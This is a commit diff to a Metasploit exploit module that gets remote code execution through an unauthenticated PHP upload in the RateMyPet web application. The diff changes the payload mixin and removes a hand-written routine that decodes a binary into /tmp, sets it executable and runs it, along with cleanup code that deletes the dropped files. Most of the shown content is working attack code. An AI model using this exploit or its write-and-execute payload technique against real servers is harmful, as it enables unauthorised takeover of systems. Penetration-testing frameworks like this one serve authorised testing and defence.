Add PhpEXE support to RateMyPet module

Author: egypt

modules/exploits/multi/http/auxilium_upload_exec.rb

@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::EXE
+	include Msf::Exploit::PhpEXE
 
 	def initialize(info={})
 		super(update_info(info,
@@ -25,8 +25,8 @@ def initialize(info={})
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'DaOne',  #Vulnerability discovery
-					'sinn3r'  #Metasploit
+					'DaOne',  # Vulnerability discovery
+					'sinn3r'  # Metasploit
 				],
 			'References'     =>
 				[
@@ -37,15 +37,11 @@ def initialize(info={})
 				{
 					'BadChars' => "\x00"
 				},
-			'DefaultOptions'  =>
-				{
-					'ExitFunction' => "none"
-				},
 			'Platform'       => ['linux', 'php'],
 			'Targets'        =>
 				[
-				[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
-				[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
+					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Sep 14 2012",
@@ -71,41 +67,6 @@ def check
 	end
 
 
-	def get_write_exec_payload(fname, data)
-		p = Rex::Text.encode_base64(generate_payload_exe)
-		php = %Q|
-		<?php
-		$f = fopen("#{fname}", "wb");
-		fwrite($f, base64_decode("#{p}"));
-		fclose($f);
-		exec("chmod 777 #{fname}");
-		exec("#{fname}");
-		?>
-		|
-		php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
-		return php
-	end
-
-
-	def on_new_session(cli)
-		if cli.type == "meterpreter"
-			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
-		end
-
-		@clean_files.each do |f|
-			print_status("#{@peer} - Removing: #{f}")
-			begin
-				if cli.type == 'meterpreter'
-					cli.fs.file.rm(f)
-				else
-					cli.shell_command_token("rm #{f}")
-				end
-			rescue ::Exception => e
-				print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
-			end
-		end
-	end
-
 
 	def upload_exec(base, php_fname, p)
 		data = Rex::MIME::Message.new
@@ -148,17 +109,8 @@ def exploit
 		base = File.dirname("#{target_uri.path}.")
 
 		php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"
-		@clean_files = [php_fname]
-
-		case target['Platform']
-		when 'php'
-			p = "<?php #{payload.encoded} ?>"
-		when 'linux'
-			bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
-			@clean_files << bin_name
-			bin = generate_payload_exe
-			p = get_write_exec_payload("/tmp/#{bin_name}", bin)
-		end
+
+		p = get_write_exec_payload(:unlink_self=>true)
 
 		upload_exec(base, php_fname, p)
 	end